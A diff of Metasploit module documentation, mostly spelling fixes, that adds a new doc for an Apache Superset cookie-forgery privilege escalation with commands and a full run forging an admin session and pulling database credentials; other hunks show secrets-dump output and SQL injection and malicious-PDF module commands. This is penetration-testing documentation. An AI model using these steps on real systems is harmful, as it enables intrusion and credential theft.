 When using Git, it's very handy (read: pretty much mandatory) to have an ambient cue in your shell telling you what branch you're currently on.  Use this function in your .profile/.bashrc/.bash_profile to enable you to place your Git branch in your prompt:

-````
+```sh
 function parse_git_branch {
  git branch --no-color 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/(\1)/'
 }
-````
+```
@@ -12,7 +12,7 @@ A fork is when you snapshot someone else's codebase into your own repo, presumab

 You only fork once, you clone as many times as you have machines on which you want to code, and you branch, commit, and push as often as you like (you don't always have to push, you can push later or not at all, but you'll have to push before doing a pull request, a.k.a. PR), and you submit a PR when you are ready.  See below

-```
+```plaintext
 github.com/rapid7/metasploit-framework --> fork --> github.com/<...>/metasploit-framework
    ^                                                          |
    |                               git clone git://github.com/<...>/metasploit-framework.git
@@ -26,4 +26,4 @@ github.com/rapid7/metasploit-framework --> fork --> github.com/<...>/metasploit-
                      `--       push       <--      branch_xyz
 ```

-(Thanks to kernelsmith for this excellent description)
+(Thanks to kernelsmith for this excellent description)
@@ -198,8 +198,7 @@ Asking for: https/TSTWLPT1000000

 Tickets in the current session can be viewed like so:

-```
-
+```msf
 meterpreter > kerberos_ticket_list
 [+] Kerberos tickets found in the current session.
 [00000000] - 0x00000012 - aes256_hmac
@@ -2,7 +2,7 @@

 Since version 6.3, Metasploit has included authentication via Kerberos for multiple types of modules. Kerberos
 authentication allows Metasploit users to request and utilize Ticket Granting Tickets (TGTs) and Ticket Granting
-Services (TGSs) to authenticate with supported modules. Metasploit uses an internal caching and storage machanism but
+Services (TGSs) to authenticate with supported modules. Metasploit uses an internal caching and storage mechanism but
 tickets are stored able to be both exported and imported from [MIT Credential Cache][1] (CCACHE) files. A converter for
 Kirbi to and from CCACHE files is also available in the `auxiliary/admin/kerberos/ticket_converter` module.

@@ -268,7 +268,7 @@ Simultaneous Users: 16777216

 ## Using external tickets with Metasploit
 A ticket obtained outside of Metasploit can be used for authentication by setting the `${Prefix}::Krb5Ccname` option
-which is prioritized over the cache. This file must be in the [MIT Credential Cache][1] (CCACHE) file formath. If the
+which is prioritized over the cache. This file must be in the [MIT Credential Cache][1] (CCACHE) file format. If the
 ticket is in the Kirbi format, it must first be converted using the `auxiliary/admin/kerberos/ticket_converter` module.

 When an explicit CCACHE file is specified to load a ticket from, Metasploit will first attempt to load a TGS ticket
@@ -547,6 +547,9 @@ NAVIGATION_CONFIG = [
              {
                path: 'How-to-check-Microsoft-patch-levels-for-your-exploit.md'
              },
+              {
+                path: "How-to-write-a-cmd-injection-module.md"
+              }
            ]
          },
          {
@@ -21,7 +21,7 @@ Shell #1:
 [*] instance i-12345678 status: initializing
 ...
 [*] instance i-12345678 status: ok
-[*] Instance i-12345678 has IP adrress 35.12.4.1
+[*] Instance i-12345678 has IP address 35.12.4.1
 [*] Auxiliary module execution completed
 ```

@@ -56,7 +56,7 @@ can be made available by assigning an Internet routable IP address to a host or
 routing traffic to it through an ELB (Elastic Load Balancer). In either case
 security-groups are used to open access to network ranges and specific TPC/UDP
 ports. Security-groups provide much of the functionality of traditional firewalls
-and can be configured by specifyig a protocol, a CIDR and a port. 
+and can be configured by specifying a protocol, a CIDR and a port. 

 ## How it Works

@@ -126,7 +126,7 @@ Advanced Options:

 * `INSTANCE_TYPE`: The instance type
 * `MaxCount`: Maximum number of instances to launch
-* `MinCount`: Minumum number of instances to launch
+* `MinCount`: Minimum number of instances to launch
 * `ROLE_NAME`: The instance profile/role name
 * `RPORT:` AWS EC2 Endpoint TCP Port
 * `SEC_GROUP_ID`: the EC2 security group to use
@@ -127,7 +127,7 @@ has the [KB5014754][KB5014754] patch applied and the REG_DWORD
 account with the specified UPN should be supplied as well. In November of 2023, Microsoft will change the default value
 of `StrongCertificateBindingEnforcement` to 2. If the server has the patch applied, the SID will be returned in the
 issued certificate which ensures that the required strong mapping is in place. If the strong mapping is required and the
-SID is not specified in the certificate, then Kerberos authentication wil fail with `KDC_ERR_CERTIFICATE_MISMATCH`.
+SID is not specified in the certificate, then Kerberos authentication will fail with `KDC_ERR_CERTIFICATE_MISMATCH`.

 The user must know:

@@ -128,7 +128,7 @@ ncasCb - Show detailed ncas information, related to either call services,
 uptime - Show phone uptime.
 appPrt - Show UI's call status.
 fntPrt - Show information about fonts available on phone.
-memtop - Shows the top poiter to current memory.
+memtop - Shows the top pointer to current memory.
 removeScheduledLogEntry - debug
 addScheduledLogEntry - debug
 fatalError - Simulate fatal error for the phone.
@@ -178,8 +178,8 @@ localePrintAll - localePrintAll
 ceShow - Show Client Engine Status

 Commands 101 to 121:
-udiShow - Show Unique Device Indentifier
-show - Show Unique Device Indentifier
+udiShow - Show Unique Device Identifier
+show - Show Unique Device Identifier
 pbnShow - Display app & bootrom headers
 upr - Upgrade to a Rockpile Standalone Image
 upm - Upgrade to a Rockpile Manf Image
@@ -336,7 +336,7 @@ ncasCb - Show detailed ncas information, related to either call services,
 uptime - Show phone uptime.
 appPrt - Show UI's call status.
 fntPrt - Show information about fonts available on phone.
-memtop - Shows the top poiter to current memory.
+memtop - Shows the top pointer to current memory.
 removeScheduledLogEntry - debug
 addScheduledLogEntry - debug
 fatalError - Simulate fatal error for the phone.
@@ -386,8 +386,8 @@ localePrintAll - localePrintAll
 ceShow - Show Client Engine Status

 Commands 101 to 121:
-udiShow - Show Unique Device Indentifier
-show - Show Unique Device Indentifier
+udiShow - Show Unique Device Identifier
+show - Show Unique Device Identifier
 pbnShow - Display app & bootrom headers
 upr - Upgrade to a Rockpile Standalone Image
 upm - Upgrade to a Rockpile Manf Image
@@ -4,7 +4,7 @@ News module extensions v5.3.2 and earlier for TYPO3 contain an SQL injection vul

 ## Vulnerable Application

-In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the paramter name. This allows a user to inject values to an SQL query.
+In vulnerable versions of the news module for TYPO3, a filter for unsetting user specified values does not account for capitalization of the parameter name. This allows a user to inject values to an SQL query.

 To exploit the vulnerability, the module generates requests and sets a value for `order` and `OrderByAllowed`, which gets passed to the SQL query. The requests are constructed to reorder the display of news articles based on a character matching. This allows a blind SQL injection to be performed to retrieve a username and password hash.

@@ -28,7 +28,7 @@ The value for query parameter `id` of the page that the news extension is runnin
 - [ ] Enable the news extension
 - [ ] Import [vulnerable page](https://github.com/rapid7/metasploit-framework/files/1015777/T3D__2017-05-20_02-17-z.t3d.zip)
 - [ ] Enable page
- [ ] Verify if page is visble to unauthenticated user and note the id
+- [ ] Verify if page is visible to unauthenticated user and note the id
 - [ ] `./msfconsole -q -x 'use auxiliary/admin/http/typo3_news_module_sqli; set rhost <rhost>; set id <id>; run'`
 - [ ] Username and password hash should have been retrieved

@@ -78,7 +78,7 @@ Default is `true`.

 This option is only used when requesting a TGS.

-The Kerberos TGT to use when requesting the sevice ticket. If unset, the database will be checked'
+The Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked'

 ## Scenarios

@@ -63,7 +63,7 @@ Export Kerberos encryption keys stored in the Metasploit database to a keytab fi
 # Secrets dump
 msf6 > use auxiliary/gather/windows_secrets_dump
 msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13
-... ommitted ...
+... omitted ...
 # Kerberos keys:
 Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01
 Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea
@@ -72,7 +72,7 @@ Administrator:des-cbc-crc:ad49d9d92f5da170
 krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c
 krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da
 krbtgt:des-cbc-md5:3ddf2f627c4cbcdc
-... ommitted ...
+... omitted ...
 [*] Auxiliary module execution completed

 # Export to keytab
@@ -94,7 +94,7 @@ Keytab entries
 1     18 (AES256)       krbtgt@adf3.local                           e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c  1970-01-01 01:00:00 +0100
 1     17 (AES128)       krbtgt@adf3.local                           ba87b2bc064673da39f40d37f9daa9da                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  krbtgt@adf3.local                           3ddf2f627c4cbcdc                                                  1970-01-01 01:00:00 +0100
-... ommitted ...
+... omitted ...
 [*] Auxiliary module execution completed
 ```

@@ -168,7 +168,7 @@ tgs-req
                  ^^^^^^^^^^^^^^ authenticator value now decrypted using the previously generated keytab file
 ```

-If you have exported the `krbtgt` account to the keytab file - Wireshark will also decrypt the TGT ticket itsel. If not - Wireshark
+If you have exported the `krbtgt` account to the keytab file - Wireshark will also decrypt the TGT ticket itself. If not - Wireshark
 will generate warnings about being unable to decrypt the TGT ticket which is signed using the krbtgt account.

 Additional details: https://wiki.wireshark.org/Kerberos
@@ -15,7 +15,7 @@ Follow the steps in the [[Installing AD CS|ad-certificates/overview.md#installin

 ## Module usage

-The `admin/ldap/ad_cs_template` module is generally used to update a certificate template as part of an ESC4 attack.
+The `admin/ldap/ad_cs_cert_template` module is generally used to update a certificate template as part of an ESC4 attack.

 1. From msfconsole
 2. Do: `use auxiliary/admin/ldap/ad_cs_cert_template`
@@ -56,11 +56,11 @@ The file format is determined by the extension so the file must end in either `.

 #### The JSON format
 The JSON file format is a hash with attribute name keys and ASCII-hex encoded values. These files are compatible with
-[`Certipy`'s][certipy] `template` command. This module uses the JSON file format when storing copies fo certificate to
+[`Certipy`'s][certipy] `template` command. This module uses the JSON file format when storing copies of certificate to
 disk.

 #### The YAML format
-The YAML file format is similiar to the JSON file format, but takes advantage of YAML's ability to include comments.
+The YAML file format is similar to the JSON file format, but takes advantage of YAML's ability to include comments.
 The file consists of a hash with attribute name keys and value strings. The `nTSecurityDescriptor` file can be either
 a binary string representing a literal value, or a security descriptor defined in Microsoft's [Security Descriptor
 Definition Language (SDDL)][sddl]. Premade configuration templates provided by Metasploit use this format.
@@ -32,7 +32,7 @@ Grant Write privileges for sandy to the target machine, i.e. `WS01`:
 $TargetComputer = Get-ADComputer 'WS01'
 $User = Get-ADUser 'sandy'

-# Add GenericWrite access to the user against the target coputer
+# Add GenericWrite access to the user against the target computer
 $Rights = [System.DirectoryServices.ActiveDirectoryRights] "GenericWrite"
 $ControlType = [System.Security.AccessControl.AccessControlType] "Allow"
 $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "All"
@@ -169,7 +169,7 @@ creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D48
 creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E278$
 creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
 creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-## oracle (10) uses usernames in the hashing, so we can't overide that here
+## oracle (10) uses usernames in the hashing, so we can't override that here
 creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
 creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
 ## oracle 11/12 H value, username is used
@@ -177,7 +177,7 @@ creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C
 ## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb
 creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:$
 creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B3$
-##postgres uses username, so we can't overide that here
+##postgres uses username, so we can't override that here
 creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
 creds add user:example postgres:md5be86a79bf20fake2d58d5453c47d4860
 echo "" > /root/.msf4/john.pot
@@ -53,7 +53,7 @@ Module options (auxiliary/client/telegram/send_message):
   BOT_TOKEN                    yes       Telegram BOT token
   CHAT_ID                      no        Chat ID for the BOT
   DOCUMENT                     no        The path to the document(binary, video etc)
-   FORMATTING  Markdown         no        Message formating option (Markdown|MarkdownV2|HTML) (Accepted: Markdown, MarkdownV2, HT
+   FORMATTING  Markdown         no        Message formatting option (Markdown|MarkdownV2|HTML) (Accepted: Markdown, MarkdownV2, HT
                                          ML)
   IDFILE                       no        File containing chat IDs, one per line
   MESSAGE                      no        The message to be sent
@@ -43,7 +43,7 @@ This module authenticates to AWS IAM (Identify Access Module) to identify user a

  **LIMIT**

-  Some AWS API calls support limiting output, such that the module will only reutrn the number of instances, without detailing the configuration of each instance.  Optionally, this module's output can be filtered to minimize the query to AWS and the user output.  Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
+  Some AWS API calls support limiting output, such that the module will only return the number of instances, without detailing the configuration of each instance.  Optionally, this module's output can be filtered to minimize the query to AWS and the user output.  Alternatively, `LIMIT` can be left blank, such that all EC2 instances will be detailed.
  
  Note that the `LIMIT` parameter is imposed per region, so the total number of results may be higher than the user-specified limit, but the maximum number of results for a single region will not exceed `LIMIT`.  This behavior is due to the AWS API.
  
@@ -10,7 +10,7 @@ Please refer to [https://cablehaunt.com/](https://cablehaunt.com/) for more info

 **WS_USERNAME**

-This is the basic auth username for the spectrum analysis web service.  This is typicall default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`.  This will vary from manufacturer to manufacturer and ISP to ISP.
+This is the basic auth username for the spectrum analysis web service.  This is typically default credentials such as `admin:password` but may also be something along the lines of `spectrum:spectrum`.  This will vary from manufacturer to manufacturer and ISP to ISP.

 **WS_PASSWORD**

@@ -85,7 +85,7 @@ msf auxiliary(fileformat/badpdf) > set pdfinject /root/Desktop/example.pdf
 pdfinject => /root/Desktop/example.pdf
 msf auxiliary(fileformat/badpdf) > exploit

-[+] Malicious file writen to /root/Desktop/example_malicious.pdf
+[+] Malicious file written to /root/Desktop/example_malicious.pdf
 [\*] Auxiliary module execution completed
 msf auxiliary(fileformat/badpdf) > 
 
@@ -0,0 +1,99 @@
+
+## Vulnerable Application
+
+Apache Superset versions <= 2.0.0 utilize Flask with a known default secret key which is used to sign HTTP cookies.
+These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that
+of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user and retrieve database
+credentials saved in Apache Superset.
+
+## App Install
+
+```
+sudo docker run -p 8088:8088 --name superset apache/superset:2.0.0
+sudo docker exec -it superset superset fab create-admin \
+              --username admin \
+              --firstname Superset \
+              --lastname Admin \
+              --email admin@superset.com \
+              --password admin
+
+sudo docker exec -it superset superset db upgrade
+sudo docker exec -it superset superset init
+```
+
+Login to the app, click 'list users' under 'Settings', then click '+'.  make a new user with 'Public' as the role.
+
+If you want any database credentials to be pulled, you'll need to configure a database as well.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/apache_superset_priv_esc`
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `run`
+1. You should get an admin cookie and the database credentials
+
+## Options
+
+### USERNAME
+
+The username to authenticate as. Required with no default.
+
+### PASSWORD
+
+The password for the specified username. Required with no default.
+
+### ADMIN_ID
+
+The ID of an admin account. Defaults to `1`
+
+### SECRET_KEYS_FILE
+
+A file containing secret keys to try. One per line. Defaults to `metasploit-framework/data/wordlists/superset_secret_keys.txt`
+
+## Scenarios
+
+### Superset 2.0.0 Docker image
+
+```
+msf6 > use auxiliary/gather/apache_superset_cookie_sig_priv_esc 
+msf6 auxiliary(gather/apache_superset_priv_esc) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/apache_superset_priv_esc) > set username user
+username => user
+msf6 auxiliary(gather/apache_superset_priv_esc) > set password user
+password => user
+msf6 auxiliary(gather/apache_superset_priv_esc) > set verbose true
+verbose => true
+msf6 auxiliary(gather/apache_superset_priv_esc) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Apache Supset 2.0.0 is vulnerable
+[*] 127.0.0.1:8088 - CSRF Token: IjkzNDBmZmI4ZDc4M2I4NWNiYzlmNWQwOGM4NTcwZDUzZGVhZDMwZjEi.ZP8uyQ.iBpplhnMpXOZnjiV1Xh_reR_uLw
+[*] 127.0.0.1:8088 - Initial Cookie: session=eyJjc3JmX3Rva2VuIjoiOTM0MGZmYjhkNzgzYjg1Y2JjOWY1ZDA4Yzg1NzBkNTNkZWFkMzBmMSIsImxvY2FsZSI6ImVuIn0.ZP8uyQ.jHXs3u8dqoBUWeL1vjUTxXOWLAo;
+[*] 127.0.0.1:8088 - Decoded Cookie: {"csrf_token"=>"9340ffb8d783b85cbc9f5d08c8570d53dead30f1", "locale"=>"en"}
+[*] 127.0.0.1:8088 - Attempting login
+[+] 127.0.0.1:8088 - Logged in Cookie: session=.eJwNjUEKwyAQRa8isw7FYiXGG3TXfQhhojMmdDCgoaWE3L2uHnx4_50ws2BdqYIfT1BHA3yx5C0n6OCZPyhbVLKnLd_USwgrqaP8FCZsC0zX1LWLQnUFzyiVOgi18Hzsb8rgYTAPzby42DuzOBuWMLCN2gVnex2tiYTRaL63mOwBhZrTxOsPSKAxLA.ZP8uyQ.UvNg89u5vOnyFiip1diP8ABrDCY;
+.eJwNjUEKwyAQRa8isw7FYiXGG3TXfQhhojMmdDCgoaWE3L2uHnx4_50ws2BdqYIfT1BHA3yx5C0n6OCZPyhbVLKnLd_USwgrqaP8FCZsC0zX1LWLQnUFzyiVOgi18Hzsb8rgYTAPzby42DuzOBuWMLCN2gVnex2tiYTRaL63mOwBhZrTxOsPSKAxLA.ZP8uyQ.UvNg89u5vOnyFiip1diP8ABrDCY
+[*] 127.0.0.1:8088 - Checking secret key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
+[-] 127.0.0.1:8088 - Incorrect Secret Key: \x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
+[*] 127.0.0.1:8088 - Checking secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+[+] 127.0.0.1:8088 - Found secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+[*] 127.0.0.1:8088 - Modified cookie: {"_flashes"=>[{" t"=>["warning", "Invalid login. Please try again."]}], "_fresh"=>false, "csrf_token"=>"9340ffb8d783b85cbc9f5d08c8570d53dead30f1", "locale"=>"en", "user_id"=>1}
+[*] 127.0.0.1:8088 - Attempting to resign with key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+[*] 127.0.0.1:8088 - New signed cookie: eyJfZmxhc2hlcyI6W3siIHQiOlsid2FybmluZyIsIkludmFsaWQgbG9naW4uIFBsZWFzZSB0cnkgYWdhaW4uIl19XSwiX2ZyZXNoIjpmYWxzZSwiY3NyZl90b2tlbiI6IjkzNDBmZmI4ZDc4M2I4NWNiYzlmNWQwOGM4NTcwZDUzZGVhZDMwZjEiLCJsb2NhbGUiOiJlbiIsInVzZXJfaWQiOjF9.ZP8uyQ.7Rgp9a7iPK-m7NQRbWpixG62CMo
+[+] 127.0.0.1:8088 - Cookie validated to user: admin
+[+] Found Super Secret DB: postgresql://dbuser:mysecretpassword@1.1.1.1:15432/supersetdb
+[*] Done enumerating databases
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/apache_superset_priv_esc) > creds
+Credentials
+===========
+
+host           origin         service           public  private       realm  private_type  JtR Format
+----           ------         -------           ------  -------       -----  ------------  ----------
+111.222.3.444  111.222.3.444  3306/tcp (mysql)  root    my-secret-pw         Password      
+```
@@ -2,7 +2,7 @@

 [CVE-2019-1653](https://nvd.nist.gov/vuln/detail/CVE-2019-1653) (aka Cisco Bugtracker ID [CSCvg85922](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info)) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router.  The vulnerability was responsibly disclosed by [RedTeam Pentesting GmbH](https://seclists.org/fulldisclosure/2019/Jan/52).

-An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information.  On version `1.4.2.15`, the vulnerabilty is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side.  On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.
+An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information.  On version `1.4.2.15`, the vulnerability is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side.  On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.

 More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019/01/29/cisco-r-rv320-rv325-router-unauthenticated-configuration-export-vulnerability-cve-2019-1653-what-you-need-to-know/).

@@ -44,7 +44,7 @@ Files containing IP addresses to blacklist during the analysis process, one per

 ### THREADS

-Number of concurent threads needed for DNS enumeration. Default: 8
+Number of concurrent threads needed for DNS enumeration. Default: 8

 ### WORDLIST

--- a/Show More
+++ b/Show More